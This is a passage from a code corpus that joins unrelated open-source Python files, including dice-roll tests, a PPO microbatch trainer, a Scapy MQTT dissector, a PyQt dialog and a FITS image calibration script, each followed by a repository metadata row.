'!r 3d6 help', '!r set 6d8?4 wod', '!r 6d12-', '!r 8d4-45?+', '!r 12d6+8-9', '!r 8d20-923+1x10?15',
'!r 6+','!r 5+2', '!r 7-', '!r 12-3', '!r 20x4', '!r 25?12', '!r 2+7x4?4', '!r 5-12x15?20']
for mode in ['wod', 'simple']:
for example in examples:
self.assertRaises(dexc.RollInputError, dice.dice_input_verification, example, mode)
def test_exploding_dice_exception(self):
examples = ['!r 5d8x9', '!r 12d60x100', '!r 1d6x9?4', '!r 78d5+x43', '!r 6d12-10x15', '!r 8d20+1x22?20']
for mode in ['wod', 'simple']:
for example in examples:
self.assertRaises(dexc.ExplodingDiceError, dice.dice_input_verification, example, mode)
def test_exploding_dice_too_small_exception(self):
examples = ['!r 5d8x1', '!r 8d6x2', '!r 3d70x1?10', '!r 10d2x2?2', '!r 78d5+x2', '!r 6d12-10x1',
'!r 8d20+1x2?20']
for mode in ['wod', 'simple']:
for example in examples:
self.assertRaises(dexc.ExplodingDiceTooSmallError, dice.dice_input_verification, example, mode)
def test_success_condition_exception(self):
examples = ['!r 2d8?9', '!r 2d15?55', '!r 65d10x6?11', '!r 32d5x5?100', '!r 78d5+?6', '!r 6d12-10?45',
'!r 8d20+1x18?200']
for mode in ['wod', 'simple']:
for example in examples:
self.assertRaises(dexc.SuccessConditionError, dice.dice_input_verification, example, mode)
def test_dice_type_exception(self):
examples = ['!r 2d0', '!r 50d0?55', '!r 6d0x6?11', '!r 32d0x5?100', '!r 78d0+?6', '!r 6d0-10?45',
'!r 8d0+1x18?200']
for mode in ['wod', 'simple']:
for example in examples:
self.assertRaises(dexc.DiceTypeError, dice.dice_input_verification, example, mode)
class DiceRollTest(unittest.TestCase):
@mock.patch('random.randint')
def test_roll_dice(self, random_call):
results = [1, 4, 6, 6, 2, 3, 5]
random_call.side_effect = results
target = dice.DiceRoll(7, 6, None, None, None)
target.roll_dice()
self.assertEqual(7, target.number_of_dice)
self.assertEqual(7, len(target.results))
for i, result in enumerate(results):
self.assertEqual(result, target.results[i])
self.assertEqual(str(result), target.formated_results[i])
@mock.patch('random.randint')
def test_total(self, random_call):
        results = [1, 10, 5, 4, 10]
        examples = [0, 5, -10, 22, -50]
        for example in examples:
            # reset the mocked rolls for each modifier so every DiceRoll
            # consumes a fresh sequence of five results
            random_call.side_effect = results
            target = dice.DiceRoll(5, 10, example, None, None)
target.roll_dice()
self.assertEqual(example, target.roll_modifier)
self.assertEqual(sum(results) + example, target.total)
@mock.patch('random.randint')
def test_explode(self, random_call):
        results = [1, 12, 5, 4, 7, 6]
        # provide one extra mocked roll for the die that explodes on the 12
        random_call.side_effect = results + [3]
target = dice.DiceRoll(6, 12, None, 12, None)
target.roll_dice()
self.assertEqual(12, target.explode_value)
self.assertEqual(len(results)+1, len(target.results))
| brmedeiros/dicey9000 | tests.py | Python | mit | 7,240 |
import tensorflow as tf
import numpy as np
from baselines.ppo2.model import Model
class MicrobatchedModel(Model):
"""
    Model that does training one microbatch at a time - useful when gradient
    computation on the entire minibatch does not fit in memory; per-microbatch
    gradients are accumulated and applied once per minibatch
"""
def __init__(self, *, policy, ob_space, ac_space, nbatch_act, nbatch_train,
nsteps, ent_coef, vf_coef, max_grad_norm, mpi_rank_weight, comm, microbatch_size):
self.nmicrobatches = nbatch_train // microbatch_size
self.microbatch_size = microbatch_size
assert nbatch_train % microbatch_size == 0, 'microbatch_size ({}) should divide nbatch_train ({}) evenly'.format(microbatch_size, nbatch_train)
super().__init__(
policy=policy,
ob_space=ob_space,
ac_space=ac_space,
nbatch_act=nbatch_act,
nbatch_train=microbatch_size,
nsteps=nsteps,
ent_coef=ent_coef,
vf_coef=vf_coef,
max_grad_norm=max_grad_norm,
mpi_rank_weight=mpi_rank_weight,
comm=comm)
self.grads_ph = [tf.placeholder(dtype=g.dtype, shape=g.shape) for g in self.grads]
grads_ph_and_vars = list(zip(self.grads_ph, self.var))
self._apply_gradients_op = self.trainer.apply_gradients(grads_ph_and_vars)
def train(self, lr, cliprange, obs, returns, masks, actions, values, neglogpacs, states=None):
assert states is None, "microbatches with recurrent models are not supported yet"
# Here we calculate advantage A(s,a) = R + yV(s') - V(s)
# Returns = R + yV(s')
advs = returns - values
# Normalize the advantages
advs = (advs - advs.mean()) / (advs.std() + 1e-8)
# Initialize empty list for per-microbatch stats like pg_loss, vf_loss, entropy, approxkl (whatever is in self.stats_list)
stats_vs = []
for microbatch_idx in range(self.nmicrobatches):
_sli = range(microbatch_idx * self.microbatch_size, (microbatch_idx+1) * self.microbatch_size)
td_map = {
self.train_model.X: obs[_sli],
self.A:actions[_sli],
self.ADV:advs[_sli],
self.R:returns[_sli],
self.CLIPRANGE:cliprange,
self.OLDNEGLOGPAC:neglogpacs[_sli],
self.OLDVPRED:values[_sli]
}
# Compute gradient on a microbatch (note that variables do not change here) ...
grad_v, stats_v = self.sess.run([self.grads, self.stats_list], td_map)
if microbatch_idx == 0:
sum_grad_v = grad_v
else:
# .. and add to the total of the gradients
for i, g in enumerate(grad_v):
sum_grad_v[i] += g
stats_vs.append(stats_v)
feed_dict = {ph: sum_g / self.nmicrobatches for ph, sum_g in zip(self.grads_ph, sum_grad_v)}
feed_dict[self.LR] = lr
# Update variables using average of the gradients
self.sess.run(self._apply_gradients_op, feed_dict)
# Return average of the stats
return np.mean(np.array(stats_vs), axis=0).tolist()
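# Hedged note (illustrative, not part of the original file): because every
# microbatch has the same size, averaging the accumulated gradients above
# matches the gradient of the mean-reduced loss over the full minibatch,
# e.g. with two microbatches the applied update uses (g1 + g2) / 2.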
| openai/baselines | baselines/ppo2/microbatched_model.py | Python | mit | 3,241 |
import django
# Django 1.5 add support for custom auth user model
from django.conf import settings
if django.VERSION >= (1, 5):
AUTH_USER_MODEL = settings.AUTH_USER_MODEL
else:
try:
from django.contrib.auth.models import User
AUTH_USER_MODEL = 'auth.User'
except ImportError:
raise ImportError(u"User model is not to be found.")
# location of patterns, url, include changes in 1.4 onwards
try:
from django.conf.urls import patterns, url, include
except:
from django.conf.urls.defaults import patterns, url, include
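# Hedged usage sketch (illustrative; the model below is an assumption, not part
# of this app):
#
#   from django.db import models
#   from relationships.compat import AUTH_USER_MODEL
#
#   class Follow(models.Model):
#       follower = models.ForeignKey(AUTH_USER_MODEL, related_name='following')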
| maroux/django-relationships | relationships/compat.py | Python | mit | 563 |
from PyQt4.QtGui import *
import pypipe.formats
import pypipe.basefile
from pypipe.core import pipeline
from widgets.combobox import ComboBox
class AddFileDialog(QDialog):
def __init__(self, parent=None):
super(AddFileDialog, self).__init__(parent)
self.formats_combo = ComboBox()
self.filename_edit = QLineEdit()
self.open_button = QPushButton('Open')
self.ok_button = QPushButton('&OK')
self.cancel_button = QPushButton('&Cancel')
self.setWindowTitle('Add file')
top_layout = QVBoxLayout()
top_layout.addWidget(QLabel('<b>File format:</b>'))
top_layout.addWidget(self.formats_combo)
top_layout.addWidget(QLabel('<b>File Name:</b>'))
center_layout = QHBoxLayout()
center_layout.addWidget(self.filename_edit)
center_layout.addWidget(self.open_button)
bottom_layout = QHBoxLayout()
bottom_layout.addWidget(self.ok_button)
bottom_layout.addWidget(self.cancel_button)
layout = QVBoxLayout()
layout.addLayout(top_layout)
layout.addLayout(center_layout)
layout.addLayout(bottom_layout)
self.setLayout(layout)
self.formats_combo.add_classes_from_module(pypipe.formats)
self.connect_all()
def connect_all(self):
self.cancel_button.clicked.connect(self.reject)
self.filename_edit.textChanged.connect(self.turn_ok_button)
self.formats_combo.currentIndexChanged.connect(self.turn_ok_button)
self.ok_button.clicked.connect(self.accept)
self.open_button.clicked.connect(self.open_file)
def turn_ok_button(self):
try:
f = self.get_file()
self.ok_button.setEnabled(True)
except pypipe.basefile.FileNotExistsError:
self.ok_button.setEnabled(False)
return
        if pipeline.can_add_file(f):
self.ok_button.setEnabled(True)
else:
self.ok_button.setEnabled(False)
def open_file(self):
file_name = QFileDialog.getOpenFileName(self, 'Open file')
self.filename_edit.setText(file_name)
def get_file(self):
init = self.formats_combo.get_current_item()
path = str(self.filename_edit.text())
return init(path)
def exec_(self):
self.turn_ok_button()
        return super(AddFileDialog, self).exec_()
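# Hedged usage sketch (illustrative; assumes a running QApplication, and the
# pipeline call shown is hypothetical - only can_add_file() appears above):
#
#   app = QApplication(sys.argv)
#   dialog = AddFileDialog()
#   if dialog.exec_() == QDialog.Accepted:
#       f = dialog.get_file()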
| ctlab/pypipe | pypipe-gui/windows/addfiledialog.py | Python | mit | 2,392 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "bitcamp.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| jerrrytan/bitcamp | bitcamp/manage.py | Python | mit | 250 |
from .lattice import default_optics_mode
from .lattice import energy
from .accelerator import default_vchamber_on
from .accelerator import default_radiation_on
from .accelerator import accelerator_data
from .accelerator import create_accelerator
from .families import get_family_data
from .families import family_mapping
from .families import get_section_name_mapping
# -- default accelerator values for TS_V03 --
lattice_version = accelerator_data['lattice_version']
| lnls-fac/sirius | pymodels/TS_V03_03/__init__.py | Python | mit | 474 |
# This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Santiago Hernandez Ramos <[email protected]>
# This program is published under GPLv2 license
from scapy.packet import Packet, bind_layers
from scapy.fields import FieldLenField, BitEnumField, StrLenField, \
ShortField, ConditionalField, ByteEnumField, ByteField, StrNullField
from scapy.layers.inet import TCP
from scapy.error import Scapy_Exception
# CUSTOM FIELDS
# source: http://stackoverflow.com/a/43717630
class VariableFieldLenField(FieldLenField):
    def addfield(self, pkt, s, val):
        val = self.i2m(pkt, val)
        # MQTT "remaining length" encoding: 7 payload bits per byte, with the
        # high bit of a byte signalling that another length byte follows.
        data = []
        while val:
            if val > 127:
                data.append(val & 127)
                val //= 128
            else:
                data.append(val)
                val = 0
        if not data:
            # a zero length is still encoded as a single 0x00 byte
            data.append(0)
        if len(data) > 4:
            raise Scapy_Exception("%s: malformed length field" %
                                  self.__class__.__name__)
        lastoffset = len(data) - 1
        data = "".join(chr(val | (0 if i == lastoffset else 128))
                       for i, val in enumerate(data))
        return s + data
def getfield(self, pkt, s):
value = 0
for offset, curbyte in enumerate(s):
curbyte = ord(curbyte)
value += (curbyte & 127) * (128 ** offset)
if curbyte & 128 == 0:
return s[offset + 1:], value
if offset > 2:
raise Scapy_Exception("%s: malformed length field" %
self.__class__.__name__)
# LAYERS
CONTROL_PACKET_TYPE = {1: 'CONNECT',
2: 'CONNACK',
3: 'PUBLISH',
4: 'PUBACK',
5: 'PUBREC',
6: 'PUBREL',
7: 'PUBCOMP',
8: 'SUBSCRIBE',
9: 'SUBACK',
10: 'UNSUBSCRIBE',
11: 'UNSUBACK',
12: 'PINGREQ',
13: 'PINGRESP',
14: 'DISCONNECT'}
QOS_LEVEL = {0: 'At most once delivery',
1: 'At least once delivery',
2: 'Exactly once delivery'}
# source: http://stackoverflow.com/a/43722441
class MQTT(Packet):
name = "MQTT fixed header"
fields_desc = [
BitEnumField("type", 1, 4, CONTROL_PACKET_TYPE),
BitEnumField("DUP", 0, 1, {0: 'Disabled',
1: 'Enabled'}),
BitEnumField("QOS", 0, 2, QOS_LEVEL),
BitEnumField("RETAIN", 0, 1, {0: 'Disabled',
1: 'Enabled'}),
# Since the size of the len field depends on the next layer, we need
# to "cheat" with the length_of parameter and use adjust parameter to
# calculate the value.
VariableFieldLenField("len", None, length_of="len",
adjust=lambda pkt, x: len(pkt.payload),),
]
class MQTTConnect(Packet):
name = "MQTT connect"
fields_desc = [
FieldLenField("length", None, length_of="protoname"),
StrLenField("protoname", "",
length_from=lambda pkt: pkt.length),
ByteField("protolevel", 0),
BitEnumField("usernameflag", 0, 1, {0: 'Disabled',
1: 'Enabled'}),
BitEnumField("passwordflag", 0, 1, {0: 'Disabled',
1: 'Enabled'}),
BitEnumField("willretainflag", 0, 1, {0: 'Disabled',
1: 'Enabled'}),
BitEnumField("willQOSflag", 0, 2, QOS_LEVEL),
BitEnumField("willflag", 0, 1, {0: 'Disabled',
1: 'Enabled'}),
BitEnumField("cleansess", 0, 1, {0: 'Disabled',
1: 'Enabled'}),
BitEnumField("reserved", 0, 1, {0: 'Disabled',
1: 'Enabled'}),
ShortField("klive", 0),
FieldLenField("clientIdlen", None, length_of="clientId"),
StrLenField("clientId", "",
length_from=lambda pkt: pkt.clientIdlen),
# Payload with optional fields depending on the flags
ConditionalField(FieldLenField("wtoplen", None, length_of="willtopic"),
lambda pkt: pkt.willflag == 1),
ConditionalField(StrLenField("willtopic", "",
length_from=lambda pkt: pkt.wtoplen),
lambda pkt: pkt.willflag == 1),
ConditionalField(FieldLenField("wmsglen", None, length_of="willmsg"),
lambda pkt: pkt.willflag == 1),
ConditionalField(StrLenField("willmsg", "",
length_from=lambda pkt: pkt.wmsglen),
lambda pkt: pkt.willflag == 1),
ConditionalField(FieldLenField("userlen", None, length_of="username"),
lambda pkt: pkt.usernameflag == 1),
ConditionalField(StrLenField("username", "",
length_from=lambda pkt: pkt.userlen),
lambda pkt: pkt.usernameflag == 1),
ConditionalField(FieldLenField("passlen", None, length_of="password"),
lambda pkt: pkt.passwordflag == 1),
ConditionalField(StrLenField("password", "",
length_from=lambda pkt: pkt.passlen),
lambda pkt: pkt.passwordflag == 1),
]
RETURN_CODE = {0: 'Connection Accepted',
1: 'Unacceptable protocol version',
2: 'Identifier rejected',
3: 'Server unavailable',
4: 'Bad username/password',
5: 'Not authorized'}
class MQTTConnack(Packet):
name = "MQTT connack"
fields_desc = [
ByteField("sessPresentFlag", 0),
ByteEnumField("retcode", 0, RETURN_CODE),
        # this packet has no payload
]
class MQTTPublish(Packet):
name = "MQTT publish"
fields_desc = [
FieldLenField("length", None, length_of="topic"),
StrLenField("topic", "",
length_from=lambda pkt: pkt.length),
ConditionalField(ShortField("msgid", None),
lambda pkt: (pkt.underlayer.QOS == 1
or pkt.underlayer.QOS == 2)),
StrLenField("value", "",
length_from=lambda pkt: (pkt.underlayer.len -
pkt.length - 2)),
]
class MQTTPuback(Packet):
name = "MQTT puback"
fields_desc = [
ShortField("msgid", None),
]
class MQTTPubrec(Packet):
name = "MQTT pubrec"
fields_desc = [
ShortField("msgid", None),
]
class MQTTPubrel(Packet):
name = "MQTT pubrel"
fields_desc = [
ShortField("msgid", None),
]
class MQTTPubcomp(Packet):
name = "MQTT pubcomp"
fields_desc = [
ShortField("msgid", None),
]
class MQTTSubscribe(Packet):
name = "MQTT subscribe"
fields_desc = [
ShortField("msgid", None),
FieldLenField("length", None, length_of="topic"),
StrLenField("topic", "",
length_from=lambda pkt: pkt.length),
ByteEnumField("QOS", 0, QOS_LEVEL),
]
ALLOWED_RETURN_CODE = {0: 'Success',
1: 'Success',
2: 'Success',
128: 'Failure'}
class MQTTSuback(Packet):
name = "MQTT suback"
fields_desc = [
ShortField("msgid", None),
ByteEnumField("retcode", None, ALLOWED_RETURN_CODE)
]
class MQTTUnsubscribe(Packet):
name = "MQTT unsubscribe"
fields_desc = [
ShortField("msgid", None),
StrNullField("payload", "")
]
class MQTTUnsuback(Packet):
name = "MQTT unsuback"
fields_desc = [
ShortField("msgid", None)
]
# LAYERS BINDINGS
bind_layers(TCP, MQTT, sport=1883)
bind_layers(TCP, MQTT, dport=1883)
bind_layers(MQTT, MQTTConnect, type=1)
bind_layers(MQTT, MQTTConnack, type=2)
bind_layers(MQTT, MQTTPublish, type=3)
bind_layers(MQTT, MQTTPuback, type=4)
bind_layers(MQTT, MQTTPubrec, type=5)
bind_layers(MQTT, MQTTPubrel, type=6)
bind_layers(MQTT, MQTTPubcomp, type=7)
bind_layers(MQTT, MQTTSubscribe, type=8)
bind_layers(MQTT, MQTTSuback, type=9)
bind_layers(MQTT, MQTTUnsubscribe, type=10)
bind_layers(MQTT, MQTTUnsuback, type=11)
bind_layers(MQTTConnect, MQTT)
bind_layers(MQTTConnack, MQTT)
bind_layers(MQTTPublish, MQTT)
bind_layers(MQTTPuback, MQTT)
bind_layers(MQTTPubrec, MQTT)
bind_layers(MQTTPubrel, MQTT)
bind_layers(MQTTPubcomp, MQTT)
bind_layers(MQTTSubscribe, MQTT)
bind_layers(MQTTSuback, MQTT)
bind_layers(MQTTUnsubscribe, MQTT)
bind_layers(MQTTUnsuback, MQTT)
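# --- Hedged usage sketch (illustrative, not part of the original contrib file).
# It assumes this module is loaded in a Scapy session; field values are made up
# and the auto-computed length fields are left to Scapy.
#
#   pkt = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId="scapy")
#   pkt.show2()      # dissect with computed fields, e.g. the variable "len"
#   hexdump(str(pkt))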
| CodeNameGhost/shiva | thirdparty/scapy/contrib/mqtt.py | Python | mit | 8,943 |
#!/usr/bin/env python
from setuptools import setup, find_packages
setup(
description='RESTful Nagios/Icinga Livestatus API',
author='Christoph Oelmueller',
url='https://github.com/zwopiR/lsapi',
download_url='https://github.com/zwopiR/lsapi',
author_email='[email protected]',
version='0.1',
install_requires=['flask', 'ConfigParser'],
tests_require=['mock', 'nose'],
packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
scripts=[],
name='lsapi'
)
| zwopiR/lsapi | setup.py | Python | mit | 511 |
from __future__ import unicode_literals
from __future__ import absolute_import
import json
import logging
import logging.config
import os
class AlpineObject(object):
"""
Base Class of Alpine API objects
"""
#
# alpine alpine version string
#
_alpine_api_version = "v1"
_min_alpine_version = "6.2"
def __init__(self, base_url=None, session=None, token=None):
self.base_url = base_url
self.session = session
self.token = token
self._setup_logging()
# Get loggers from the configuration files(logging.json) if exists
# For detail, reference logging.json
self.logger = logging.getLogger("debug") # debug
def _add_token_to_url(self, url):
"""
Used internally to properly form URLs.
:param str url: An Alpine API URL
:return: Formatted URL
        :rtype: str
"""
return str("{0}?session_id={1}".format(url, self.token))
@staticmethod
def _setup_logging(default_configuration_setting_file='logging.json',
default_level=logging.INFO,
env_key='LOG_CFG'):
"""
Sets internal values for logging through a file or an environmental variable
:param str default_configuration_setting_file: Path to logging config file. Will be overwritten by
environment variable if it exists.
:param default_level: See possible levels here: https://docs.python.org/2/library/logging.html#logging-levels
:param str env_key: Name of environment variable with logging setting.
:return: None
"""
path = default_configuration_setting_file
value = os.getenv(env_key, None)
if value:
path = value
else:
pass
if os.path.exists(path):
with open(path, 'rt') as f:
config = json.load(f)
logging.config.dictConfig(config)
else:
logging.basicConfig(level=default_level,
format="%(asctime)s %(name)s %(module)s[%(lineno)d] %(levelname)s: %(message)s")
| AlpineNow/python-alpine-api | alpine/alpineobject.py | Python | mit | 2,190 |
#
#calibrate.py
#
#calibrate fits images using darks, flats, and bias frames
#corrected image = (image - bias - k(dark-bias))/flat
#for k=1, i.e. image exp = dark exp, corrected image = (image - dark)/flat
import os
import glob
import math
import subprocess
import re
import sys
import datetime
import shutil
from decimal import Decimal
from astropy.io import fits
from astropy import wcs
from astropy import log
log.setLevel('ERROR')
from astropy import units as u
import ccdproc
import numpy as np
def logme( str ):
log.write(str + "\n")
print str
return
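#usage (illustrative note, not in the original script): run from the folder that
#holds the light frames, with bias/, dark/ and flat/ subfolders present, e.g.
#   python calibrate.py                  #calibrate full frames
#   python calibrate.py 1 2048 1 2048    #also trim NAXIS1/NAXIS2 to 1..2048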
#MODIFY THESE FIELDS AS NEEDED!
#input path *with* ending forward slash
input_path='./'
#output path *with* ending forward slash
output_path='./calibrated/'
#log file name
log_fname = 'log.calibrate.txt'
#suffix for output files, if any...
output_suffix='.calibrated'
#used in master calibration filenames
date_suffix = datetime.datetime.now().strftime('%Y%m%d.%H%M%S')
#master bias frame
#folder with bias component frames *including* ending forward slash
bias_path='./bias/'
bias_master = 'mbias.' + date_suffix + '.fits'
#master dark frame
#folder with dark component frames *including* ending forward slash
dark_path='./dark/'
dark_is_bias_corrected = False
dark_bias = None
dark_master = 'mdark.' + date_suffix + '.fits'
#master flat frame
#folder with bias component frames *including* ending forward slash
flat_path='./flat/'
flat_is_bias_corrected = False
flat_bias = None
flat_is_dark_corrected = False
flat_dark = None
flat_ave_exptime = 0
flat_master = 'mflat.' + date_suffix + '.fits'
#name of exposure variable in FITS header file
exposure_label='EXPTIME'
log=open(log_fname, 'a+')
#trim image? set range here, or set to '' to disable
trim_range = ''
if(len(sys.argv) == 5):
naxis1_start = int(sys.argv[1])
naxis1_end = int(sys.argv[2])
naxis2_start = int(sys.argv[3])
naxis2_end = int(sys.argv[4])
trim_range = '[%d:%d, %d:%d]'%(naxis1_start, naxis1_end, naxis2_start, naxis2_end) #starts at 1, inclusive
logme('Trimming images to NAXIS1=%d to %d, NAXIS2=%d to %d.'%(naxis1_start, naxis1_end, naxis2_start, naxis2_end))
#does output directory exist? If not, create it
try:
os.mkdir(output_path)
except:
pass
#bias
#create master bias frame
im=glob.glob(bias_path+'*.fits')+glob.glob(bias_path+'*.fit')
if(len(im) <= 0):
logme('Error. Bias calibration frame(s) not found (%s).' % bias_path)
log.close()
sys.exit(-1)
biases = None
for i in range(0,len(im)):
if(biases):
biases += ','+im[i]
else:
biases = im[i]
#if there is just one, make it two of the same for the combine!
if (len(im) == 1):
biases += ','+im[0]
bias_path += 'master/'
try:
os.mkdir(bias_path)
except:
pass
bias_path += bias_master
logme('Creating master bias frame (%s)...'%(bias_path))
bias = ccdproc.combine(biases, method='median', unit='adu', add_keyword=False)
#trim it, if necessary
if(len(trim_range) > 0):
bias = ccdproc.trim_image(bias, trim_range);
#write master frame to file
hdulist = bias.to_hdu()
hdulist.writeto(bias_path, clobber=True)
#dark
#create master dark frame
im=glob.glob(dark_path+'*.fits')+glob.glob(dark_path+'*.fit')
if(len(im) <= 0):
logme('Error. Dark calibration frame(s) not found (%s).' % dark_path)
log.close()
sys.exit(-1)
darks = None
bias_header = None
for i in range(0,len(im)):
#is (any) dark bias corrected?
header = fits.getheader(im[i])
if(header.get('BIAS') != None):
dark_is_bias_corrected = True
dark_bias = header.get('BIAS')
elif(header.get('BIASCORR') != None):
dark_is_bias_corrected = True
dark_bias = header.get('BIASCORR')
if(darks):
darks += ','+im[i]
else:
darks = im[i]
#if there is just one, make it two of the same for the combine!
if (len(im) == 1):
darks += ','+im[0]
dark_path += 'master/'
try:
os.mkdir(dark_path)
except:
pass
dark_path += dark_master
logme('Creating master dark frame (%s)...'%(dark_path))
dark = ccdproc.combine(darks, method='median', unit='adu', add_keyword=False, **{'verify': 'ignore'})
#trim it, if necessary
if(len(trim_range) > 0):
dark = ccdproc.trim_image(dark, trim_range);
#bias correct, if necessary
if(not dark_is_bias_corrected):
#logme('Subtracting master bias frame from master dark frame...')
dark = ccdproc.subtract_bias(dark, bias, add_keyword=False)
dark_bias = bias_master
else:
logme('Master dark frame is *already* bias corrected (%s).'%dark_bias)
#write master dark frame
hdulist = dark.to_hdu()
#add bias correction to header
header=hdulist[0].header
header['BIASCORR'] = dark_bias
hdulist.writeto(dark_path, clobber=True)
#flat
#create master flat frame
im=glob.glob(flat_path+'*.fits')+glob.glob(flat_path+'*.fit')
if(len(im) <= 0):
logme('Error. Flat calibration frame(s) not found (%s).' % flat_path)
log.close()
sys.exit(-1)
flats = None
count = 0
flat_corrected = None
#check a few things in these flat component frames
for i in range(0,len(im)):
header = fits.getheader(im[i])
#is this flat bias corrected?
if(header.get('BIAS') != None):
flat_is_bias_corrected = True
flat_bias = header.get('BIAS')
elif(header.get('BIASCORR') != None):
flat_is_bias_corrected = True
flat_bias = header.get('BIASCORR')
#is this flat dark corrected?
if(header.get('DARK') != None):
flat_is_dark_corrected = True
flat_dark = header.get('DARK')
elif(header.get('DARKCORR') != None):
flat_is_dark_corrected = True
flat_dark = header.get('DARKCORR')
flat_corrected = "%s"%(im[i].rsplit('.',1)[0])+".corrected"
shutil.copy(im[i], flat_corrected)
#trim as necessary
if(len(trim_range) > 0):
flat = ccdproc.CCDData.read(flat_corrected, unit='adu', relax=True)
flat = ccdproc.trim_image(flat, trim_range)
hdulist = flat.to_hdu()
hdulist.writeto(flat_corrected, clobber=True)
#bias correct, if necessary
if(not flat_is_bias_corrected):
#logme('Subtracting master bias frame from flat frame...')
flat = ccdproc.CCDData.read(flat_corrected, unit='adu', relax=True)
#trim it, if necessary
#if(len(trim_range) > 0):
# flat = ccdproc.trim_image(flat, trim_range);
#flat = ccdproc.subtract_bias(flat, bias, add_keyword=False)
hdulist = flat.to_hdu()
#add bias correction to header
header=hdulist[0].header
header['BIASCORR'] = flat_bias
hdulist.writeto(flat_corrected, clobber=True)
flat_bias = bias_master
else:
logme('Flat frame (%s) is *already* bias corrected (%s).'%(im[i],flat_bias))
#dark correct, if necessary
if(not flat_is_dark_corrected):
#logme('Subtracting master dark frame from flat frame...')
flat = ccdproc.CCDData.read(flat_corrected, unit='adu', relax=True)
##trim it, if necessary
#if(len(trim_range) > 0):
# flat = ccdproc.trim_image(flat, trim_range);
flat = ccdproc.subtract_dark(flat, dark, scale=True, exposure_time=exposure_label, exposure_unit=u.second, add_keyword=False)
hdulist = flat.to_hdu()
#add bias correction to header
header=hdulist[0].header
header['DARKCORR'] = dark_bias
hdulist.writeto(flat_corrected, clobber=True)
flat_dark = dark_master
else:
logme('Flat frame (%s) is *already* dark corrected (%s).'%(im[i],flat_dark) )
if(flats):
flats += ','+flat_corrected
else:
flats = flat_corrected
#calc average exposure time for potential dark correction
if(header.get('EXPTIME') != None):
#print header.get('EXPTIME')
try:
exptime = float(header.get('EXPTIME'))
flat_ave_exptime += exptime
except ValueError:
logme('Exposure time (EXPTIME) is not a float (%s).'%(header.get('EXPTIME')))
count += 1
#calc average exposure time
#if(count > 0):
# flat_ave_exptime = flat_ave_exptime/count
# flat.header['EXPTIME'] = flat_ave_exptime
# logme("Average exposure time for flats is %f"%flat_ave_exptime)
#if there is just one, make it two of the same!
if (len(im) == 1):
flats += ','+flat_corrected
flat_path += 'master/'
try:
os.mkdir(flat_path)
except:
pass
flat_path += flat_master
logme('Creating master flat frame (%s)...'%(flat_path))
#scale the flat component frames to have the same mean value, 10000.0
scaling_func = lambda arr: 10000.0/np.ma.median(arr)
#combine them
flat = ccdproc.combine(flats, method='median', scale=scaling_func, unit='adu', add_keyword=False)
##trim it, if necessary
#if(len(trim_range) > 0):
# #logme('Trimming flat image (%s)...'%(trim_range))
# flat = ccdproc.trim_image(flat, trim_range);
#write master flat frame
hdulist = flat.to_hdu()
#add bias correction to header
header=hdulist[0].header
header['BIASCORR'] = flat_bias
header['DARKCORR'] = flat_dark
if(count > 0):
flat_ave_exptime = flat_ave_exptime/count
header['EXPTIME'] = flat_ave_exptime
hdulist.writeto(flat_path, clobber=True)
#get a list of all FITS files in the input directory
fits_files=glob.glob(input_path+'*.fits')+glob.glob(input_path+'*.fit')
#loop through all qualifying files and calibrate them
logme('Calibrating images in %s' %input_path)
for fits_file in fits_files:
#open image
image = ccdproc.CCDData.read(fits_file, unit='adu', relax=True)
#trim it, if necessary
if(len(trim_range) > 0):
image = ccdproc.trim_image(image, trim_range);
#subtract bias from light, dark, and flat frames
image = ccdproc.subtract_bias(image, bias, add_keyword=False)
image = ccdproc.subtract_dark(image, dark, scale=True, exposure_time=exposure_label, exposure_unit=u.second, add_keyword=False)
image = ccdproc.flat_correct(image, flat, add_keyword=False)
#save calibrated image
output_file = "%s"%(fits_file.rsplit('.',1)[0])+output_suffix+".fits"
output_file = output_file.rsplit('/',1)[1]
output_file = output_path+output_file
#scale calibrated image back to int16, some FITS programs don't like float
hdulist = image.to_hdu()
hdulist[0].scale('int16', bzero=32768)
hdulist[0].header['BIASCORR'] = bias_master
hdulist[0].header['DARKCORR'] = dark_master
hdulist[0].header['FLATCORR'] = flat_master
if(len(trim_range) > 0):
hdulist[0].header['NAXIS1'] = '%d'%((naxis1_end-naxis1_start))
hdulist[0].header['NAXIS2'] = '%d'%((naxis2_end-naxis2_start))
hdulist.writeto(output_file, clobber=True)
logme('Calibrated %d images and saved to %s.' %(len(fits_files),output_path))
log.close()
| mcnowinski/various-and-sundry | lightcurve/super.calibrate.py | Python | mit | 10,853 |
import time
def check_vertical(matrix):
max_product = 0
for row in xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)):
product = matrix[row][col] * matrix[row+1][col] * matrix[row+2][col] * matrix[row+3][col]
max_product = max(product, max_product)
return max_product
def check_horizontal(matrix):
max_product = 0
for row in xrange(0, len(matrix)):
for col in xrange(0, len(matrix)-3):
            product = reduce(lambda x,y: x*y, matrix[row][col:col+4])
max_product = max(product, max_product)
return max_product
def check_left_diagonal(matrix):
max_product = 0
for row in xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)-3):
product = matrix[row][col] * matrix[row+1][col+1] * matrix[row+2][col+2] * matrix[row+3][col+3]
max_product = max(product, max_product)
return max_product
def check_right_diagonal(matrix):
max_product = 0
for row in xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)-3):
product = matrix[row+3][col] * matrix[row+2][col+1] * matrix[row+1][col+2] * matrix[row][col+3]
max_product = max(product, max_product)
return max_product
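# Quick sanity-check sketch (illustrative, not part of the original solution):
#   grid = [[1, 2, 3, 4],
#           [5, 6, 7, 8],
#           [9, 10, 11, 12],
#           [13, 14, 15, 16]]
#   check_horizontal(grid)    # 13*14*15*16 = 43680
#   check_vertical(grid)      # 4*8*12*16 = 6144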
def main():
with open("011.txt", "r") as f:
# Read the matrix from the text file, and store in an integet 2-dimensional array
matrix = []
for line in f.readlines():
matrix.append([int(num) for num in line.split(" ")])
# print matrix
# Check the matrix along the various directions, and find the max product of four adjacent numbers
print("The result is %d." % max(check_vertical(matrix), check_horizontal(matrix), check_left_diagonal(matrix), check_right_diagonal(matrix)))
if __name__ == '__main__':
start = time.time()
main()
done = time.time()
